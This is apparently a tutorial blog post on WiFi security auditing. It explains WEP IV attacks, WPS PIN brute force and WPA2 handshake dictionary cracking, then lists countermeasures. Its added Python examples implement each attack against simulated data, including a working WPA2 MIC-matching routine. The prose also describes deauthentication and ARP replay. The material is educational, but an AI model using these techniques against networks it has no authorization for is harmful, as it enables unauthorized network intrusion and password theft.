Auditing Wireless Security | Basics of WiFi Hacking & Security

I wrote this article to lay the foundation of WiFi hacking and security for you. Why? Because running hacking tools and copying my commands won’t make you a professional. You should at least understand the basic concepts and the reasons behind each step; otherwise you’ll be recognized as a script kiddie.


Wireless networks are protected by encryption and authentication mechanisms. Data transmitted over a wireless network is encrypted under WEP, WPA or WPA2 (WPA normally uses the TKIP cipher, WPA2 uses AES-CCMP), and the key for that encryption is derived from the network password.

WEP stands for Wired Equivalent Privacy!
WPA stands for WiFi Protected Access!
WPS stands for WiFi Protected Setup!

Soon you’ll be able to recover WiFi passwords for WEP, WPA and WPA2 networks, as well as WPS PINs, using tools such as wifite, aircrack-ng, reaver and Fern WiFi Cracker.

Required Resources

To successfully audit (and then secure) a wireless network, we need the following tools and resources:

  • Kali Linux (includes the Aircrack-ng suite and wifite).
  • A WiFi adapter that supports monitor mode and packet injection.
  • A target WiFi network that you own (YT video: Create Mobile Hotspot WEP, WPA, WPA2)

HARDWARE INFO: If your system’s built-in WiFi card isn’t supported by Kali Linux or wifite (no monitor mode or no injection), you need an external WiFi adapter.

  • TP-LINK TL-WN722N (I’m using this; the v1 hardware with the Atheros AR9271 chipset is supported out of the box, no configuration required. Later hardware revisions of the same model use a Realtek chipset and need an extra driver, so check the version printed on the box.)
  • Alfa AWUS036NH (supported; higher range and more powerful)

You can also attach different detachable antennas to your adapter for more range.

Time Needed

Here are some rough figures for “time needed to crack” and “chances of success”. These are estimates from my own experience, not measurements; your results depend heavily on the factors listed in the next section.

WEP: Less than 2 minutes in most cases once enough traffic has been captured – about 99% chance of success, because the attack is statistical and does not depend on the password being weak.
WPA or WPA2: From a few seconds (weak password that is in your wordlist) to never (strong password that is in no list) – about 10% chance of success.
WPS enabled: Sometimes a few seconds, but usually 8–12 hours of PIN guessing – about 50% chance, since many access points rate-limit or lock WPS after a number of failed attempts.

Factors Involved

There are a few things to consider before you begin auditing your wireless security. The following factors can greatly affect the whole process:

  • DISTANCE: The greater the distance between you and the target, the weaker the signal. Weak signal strength means more lost frames, so the process takes more (or effectively infinite) time.
  • NETWORK TRAFFIC: Many connected clients and a high volume of data speed up the whole process, because more packets (and, for WEP, more unique IVs) are captured in the same time.
  • WIRELESS CARD QUALITY: Poor wireless adapters (weak, low-powered, or with a bad driver) slow the attack down. With a consistently low signal, not enough packets are captured.
  • SIGNAL INTERFERENCE: Several wireless networks around you, usually on the same or overlapping channels, slow things down. Frames collide and are corrupted, so the effective signal quality degrades.

Concept | Auditing Wireless Security

Hacking WEP WiFi Password!

Going into the actual algorithms and encryption details of each security mechanism would be more confusing than useful right now. Let me explain it in simple, plain English.

Most tools that security professionals use for wireless auditing (wifite and Fern included) internally use aircrack-ng. There are a few general steps in WEP key cracking:

  1. Put the wireless card into monitor mode (usually with airmon-ng) so that it listens to every frame from all nearby WiFi networks.
  2. Select a target and capture its data frames into a file (usually with airodump-ng; its IVS mode keeps only the parts the attack needs). WEP encrypts every frame with RC4 keyed by a 24-bit IV (sent in the clear in each frame) plus the secret key. The key itself is never transmitted, so there is no “encrypted password” to find; what you collect is tens of thousands of unique IVs together with the first bytes of ciphertext. This requires an active AP (access point), and if the network is quiet, aireplay-ng is used to replay ARP frames and generate more traffic.
  3. Feed the saved capture to aircrack-ng. It runs a statistical attack on the IVs (PTW by default, KoreK/FMS as a fallback): each IV gives a weak “vote” on a key byte, the votes accumulate, and the key is recovered directly. No password dictionary is involved.
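To make the “statistical analysis of IVs” concrete, here is a small simulation of the original FMS attack on a 40-bit WEP key. This is an added example, not code from the original article and not aircrack-ng’s implementation (aircrack-ng defaults to the newer PTW attack, which needs far fewer IVs). Everything in it is constructed: the key `DEMO_KEY`, the simulated access point, and the capture, which is reduced to the weak IVs of the form (A+3, 255, X) that FMS can use. A real capture has to be large enough to contain such IVs by chance, which is why so many frames are collected. The attacker only sees each frame’s IV and first ciphertext byte, and knows the first plaintext byte because every WEP data frame starts with an 802.2 SNAP header whose first byte is 0xAA.

```python
"""FMS-style key recovery from WEP IVs (added example; simulated capture)."""

SNAP_FIRST_BYTE = 0xAA                                # known first plaintext byte of every frame
DEMO_KEY = bytes([0x3A, 0x7F, 0x11, 0xC9, 0x05])      # constructed 40-bit WEP key (the secret)


def rc4_first_keystream_byte(key):
    """Run the RC4 key schedule (KSA) and return only the first keystream byte."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    j = S[1]                                          # first PRGA step: i = 1, j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def ap_encrypt_first_byte(iv, key):
    """What the access point transmits: plaintext XOR keystream of RC4(IV || key)."""
    return SNAP_FIRST_BYTE ^ rc4_first_keystream_byte(bytes(iv) + key)


def capture_weak_frames(key, key_len=5):
    """Simulated airodump-ng capture, reduced to the FMS 'weak' IVs (A+3, 255, X).
    Returns a list of (iv, first_ciphertext_byte), which is all the attacker sees."""
    return [((a + 3, 255, x), ap_encrypt_first_byte((a + 3, 255, x), key))
            for a in range(key_len) for x in range(256)]


def fms_votes(frames, known_prefix):
    """Vote on key byte A = len(known_prefix) using every 'resolved' IV."""
    a = len(known_prefix)
    votes = [0] * 256
    for iv, c0 in frames:
        ks0 = c0 ^ SNAP_FIRST_BYTE                    # known plaintext -> first keystream byte
        k = list(iv) + list(known_prefix)             # IV and already-recovered key bytes
        S = list(range(256))
        j = 0
        for i in range(a + 3):                        # replay the KSA steps that use known bytes
            j = (j + S[i] + k[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        # Resolved condition: if S[1] and S[S[1]] survive the rest of the KSA (about a 5%
        # chance), the first keystream byte is whatever step a+3 places into S[a+3].
        if S[1] >= a + 3 or (S[1] + S[S[1]]) & 0xFF != a + 3:
            continue
        # Step a+3 sets S[a+3] = S[j_next] with j_next = j + S[a+3] + K[a]; invert that.
        j_next = S.index(ks0)
        votes[(j_next - j - S[a + 3]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len=5, fudge=4, verify=6):
    """Depth-first search over the top `fudge` candidates per byte (the same idea as
    aircrack-ng's fudge factor), verifying each complete key against a few frames."""
    def search(prefix):
        if len(prefix) == key_len:
            key = bytes(prefix)
            if all(ap_encrypt_first_byte(iv, key) == c0 for iv, c0 in frames[:verify]):
                return key
            return None
        votes = fms_votes(frames, prefix)
        for cand in sorted(range(256), key=lambda b: -votes[b])[:fudge]:
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None
    return search([])


if __name__ == "__main__":
    frames = capture_weak_frames(DEMO_KEY)
    print("captured", len(frames), "weak IVs")
    print("recovered key:", recover_key(frames).hex())
```

The point to take away is in `fms_votes`: a single IV says almost nothing, but only the correct key byte receives votes consistently, so the signal rises above the noise once enough weak IVs have been seen. That is why the tutorial’s step 2 is about volume of captured traffic, not about finding a password in it.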

Cracking WPS WiFi Pin

WPS is a convenience feature (push-button or an 8-digit PIN printed on the router) that turned out to be vulnerable to brute force. The last digit of the PIN is a checksum, and the access point confirms the first four digits separately from the last three during the protocol exchange, so an attacker needs at most 10,000 + 1,000 = 11,000 attempts instead of 100,000,000.

Just like any other password cracking process, this is as simple as selecting a WiFi target and testing PINs against it. Unlike WPA cracking, it is an online attack: every guess is a round-trip with the access point, which is why it takes hours and why some routers can slow it down or lock WPS after repeated failures.

Reaver is the tool used to brute force the WPS PIN. Once the PIN is known, the AP hands over the actual WPA/WPA2 password, no matter how strong it is.
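The following is an added illustration of why the PIN search is so small. It is not reaver’s code and not part of the original article. The “registrar” class stands in for the access point and answers the way a WPS AP does: it rejects a wrong first half at message M4, before it has even checked the second half, and rejects a wrong second half at M6. The PIN 12345670 is constructed for the demo (it happens to be a well-known default); the checksum algorithm is the standard WPS one.

```python
"""WPS PIN brute force against a simulated registrar (added example)."""

MAX_ATTEMPTS = 10_000 + 1_000     # first half (4 digits) + second half (3 digits, 8th is checksum)


def wps_checksum(first7):
    """Checksum digit that turns a 7-digit prefix into a valid 8-digit WPS PIN."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin8):
    return 0 <= pin8 <= 99_999_999 and pin8 % 10 == wps_checksum(pin8 // 10)


class SimulatedRegistrar:
    """Stand-in for the AP's WPS registrar; the secret PIN is constructed for the demo."""

    def __init__(self, pin8):
        assert is_valid_pin(pin8), "real AP PINs always carry a valid checksum"
        self._first, self._second = pin8 // 10_000, pin8 % 10_000
        self.attempts = 0

    def try_pin(self, pin8):
        """Answer 'M4-NACK', 'M6-NACK' or 'OK', mirroring where the real exchange fails."""
        self.attempts += 1
        if pin8 // 10_000 != self._first:
            return "M4-NACK"      # first half wrong: rejected before the second half is examined
        if pin8 % 10_000 != self._second:
            return "M6-NACK"      # first half right, second half wrong
        return "OK"


def brute_force_pin(registrar):
    """Reaver-style split search: at most MAX_ATTEMPTS round-trips with the AP."""
    first = None
    for f in range(10_000):                           # digits 1-4
        if registrar.try_pin(f * 10_000) != "M4-NACK":
            first = f
            break
    if first is None:
        return None
    for s3 in range(1_000):                           # digits 5-7; digit 8 is computed, not guessed
        candidate = first * 10_000 + s3 * 10 + wps_checksum(first * 1_000 + s3)
        if registrar.try_pin(candidate) == "OK":
            return candidate
    return None


if __name__ == "__main__":
    ap = SimulatedRegistrar(12345670)
    print("recovered PIN:", brute_force_pin(ap), "after", ap.attempts, "attempts")
```

Without the split confirmation, the attacker would face 10^7 valid PINs; with it, the first half and the second half are searched independently, which is the whole weakness.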

Hacking WPA and WPA2 WiFi

To recover the password of a WPA or WPA2 network, we need the handshake packets and a password dictionary. Let’s look at both terms:

Handshake: When a client authenticates to an access point, the two exchange four EAPOL-Key frames, the so-called 4-way handshake. The AP sends a random number (the ANonce), the client answers with its own random number (the SNonce) and a MIC (message integrity code), and the remaining two messages confirm the keys. The MIC is computed with a key that both sides derive from the WiFi password, the network name (SSID), both MAC addresses and both nonces. To crack WPA or WPA2, we try to capture these handshake packets.

The handshake does not contain the password, not even in hashed form. It contains the nonces and a MIC keyed with a value derived from the password. An attacker who has the handshake can derive that same key from any candidate password and check whether the MIC matches; a match means the candidate is the real password. Capturing a handshake takes only seconds, and the guessing is then done offline with no further contact with the network.

A password dictionary (wordlist) is a file containing words from human dictionaries (English, German etc.), leaked password lists and other sources. Most people, unaware of hacking and security, choose easy passwords such as words or phrases from a dictionary, and those can be cracked quickly with a wordlist.

A dictionary file might contain few hundreds to billions of passwords.

Now, the concept in simple and plain English. These are the general steps in WPA2 (or WPA) password cracking:

  1. Put the wireless card into monitor mode (usually with airmon-ng) so that it listens to all nearby WiFi networks.
  2. Select a WPA2 (or WPA) target and capture its traffic into a file (usually with airodump-ng), waiting for the 4-way handshake frames. This requires an active AP (access point) and at least one client.
  3. At the same time, disconnect an associated client from the AP (usually with aireplay-ng deauthentication frames). The client reconnects and re-authenticates, the handshake happens again, and we get the chance to capture it.
  4. Feed the captured handshake to aircrack-ng together with a wordlist. For every candidate, aircrack-ng derives the key from the candidate and the SSID (PBKDF2 with 4096 iterations, which is deliberately slow), recomputes the MIC and compares it with the captured one. This is a dictionary attack, not a true brute force: a long random password that is in no wordlist will not be found.
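The following added example shows what step 4 actually computes. It is not code from the original article and not aircrack-ng’s implementation. Because no capture file is available here, `build_demo_handshake` constructs the handshake material itself from a made-up SSID, MAC addresses, nonces and passphrase; in a real audit, those fields come from the EAPOL-Key frames in the capture. The derivation itself (PBKDF2-HMAC-SHA1 over passphrase and SSID, the 802.11i PRF for the PTK, and an HMAC over the EAPOL frame with its MIC field zeroed) is the standard one and is checked against the IEEE 802.11i test vector.

```python
"""Offline dictionary attack on a WPA2 4-way handshake (added example, constructed data)."""
import hashlib
import hmac

EAPOL_MIC_OFFSET = 81          # MIC field of an EAPOL-Key frame occupies bytes 81..96
KEY_INFO_OFFSET = 5            # 2-byte Key Information field; descriptor version is its low 3 bits


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """Key Confirmation Key: the first 16 bytes of the PTK from the 802.11i PRF."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return ptk[:16]


def eapol_mic(kck, eapol_frame):
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    version = eapol_frame[KEY_INFO_OFFSET + 1] & 0x07
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_handshake(hs, wordlist):
    """For each candidate: PMK -> KCK -> MIC, compared with the MIC in the captured frame."""
    captured_mic = hs["eapol"][EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs["ssid"]),
                           hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


def build_demo_handshake(passphrase):
    """CONSTRUCTED stand-in for what airodump-ng would capture (message 2, client -> AP).
    SSID, MAC addresses and nonces are made up; key data is left empty for brevity."""
    ssid = "CoffeeShop-Guest"
    ap_mac = bytes.fromhex("020000000001")          # locally administered, fictional
    sta_mac = bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"demo anonce").digest()
    snonce = hashlib.sha256(b"demo snonce").digest()
    body = (b"\x02"                                  # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")            # key info: version 2, pairwise, MIC present
            + (16).to_bytes(2, "big")                # key length
            + (1).to_bytes(8, "big")                 # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16                           # MIC placeholder
            + (0).to_bytes(2, "big"))                # key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type EAPOL-Key
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = frame[:EAPOL_MIC_OFFSET] + eapol_mic(kck, frame) + frame[EAPOL_MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": frame}


if __name__ == "__main__":
    handshake = build_demo_handshake("sunflower42")          # secret, only the AP and client know it
    wordlist = ["password", "letmein", "sunflower42", "dragon"]   # constructed dictionary
    print("recovered passphrase:", crack_handshake(handshake, wordlist))
```

Note where the cost sits: `pmk_from_passphrase` runs 4096 HMAC iterations per candidate, so every guess is expensive by design, and the attacker cannot shortcut it because the SSID is mixed into the derivation (a precomputed table is only valid for one network name). The MIC check is done with `hmac.compare_digest` purely out of habit; in an offline attack timing does not matter.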

Countermeasures | Protect your WiFi

You should always focus on auditing (and tightening) your own wireless security instead of going to jail for hacking someone else’s access point. Here are some tips you can implement to protect your wireless network.

  • Change the WiFi security from WEP to WPA2 (with AES/CCMP, or WPA3 where your devices support it). WEP is deprecated: its key can be recovered from captured traffic regardless of how strong the password is.
  • Disable WPS, since its PIN method is vulnerable to the brute force attack described above and a recovered PIN hands out your WPA2 password directly. If your router only lets you disable the PIN (external registrar) method, do at least that.
  • Always choose a strong password. Length matters more than mixing symbols: a long passphrase (15 or more characters, or several unrelated random words) that appears in no wordlist is beyond dictionary attacks. Eight characters is the minimum WPA accepts, not a safe target.
  • Change your WiFi password periodically. If someone gets hold of your password somehow, they shouldn’t be able to use it for long, and any handshake they captured earlier becomes worthless.
  • Finally, try to crack your own WiFi password (as shown in this tutorial), then understand the result and upgrade your WiFi security accordingly. Repeat this process and keep your security tight.

More Resources

So you have read this far? To be honest, this article wasn’t very hands-on, but you are now at least prepared for WiFi hacking and security.

Recommended Books

Here are two popular books on Wireless Security Auditing:

Further Readings

Now you are ready to perform wireless security auditing. Please find “How to perform” details in following articles:


Here are a few external links that complement this article. Warning: they are a bit technical!
